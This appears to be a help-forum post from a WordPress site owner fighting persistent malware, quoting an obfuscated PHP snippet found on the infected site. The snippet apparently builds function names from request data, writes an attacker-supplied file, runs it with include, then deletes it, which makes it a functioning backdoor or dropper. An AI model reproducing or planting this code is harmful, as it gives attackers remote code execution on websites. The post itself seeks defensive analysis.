I am dealing with Malware that keeps recreating files and is really hard to get rid of. Here is some code I think might be relevant..
The problem mainly affected WordPress Sites, I updated all the PHP versions and got rid of old plugins. I think it might be due to the recent Bricks exploit that happened around Valentines Day.
<?php
$tM = ${"137" . "103117117113" . "111105"};
if (isset($tM[(99 - 0)])) {
$ScL = $tM[(88 - 8)] . $tM[(38 - 10)];
$skZ = $ScL($tM[(58 - 27)] . $tM[(44 - 33)]);
$nTO = $skZ($ScL($tM[(98 - 1)]));
$lvo = $skZ($ScL($tM[(71 - 19)]));
$yJd = __DIR__ . $skZ($ScL($tM[(74 - 17)]));
$nTO($yJd, $skZ($ScL($tM[(99 - 0)])));
include($yJd);
$lvo($yJd);
}
I already tried decoding this using Gemini, ChatGPT and Mixtral as well as by hand but I didn’t get too far. I hope I get some more insights of what is happening, what this code does and why it keeps duplicating itself.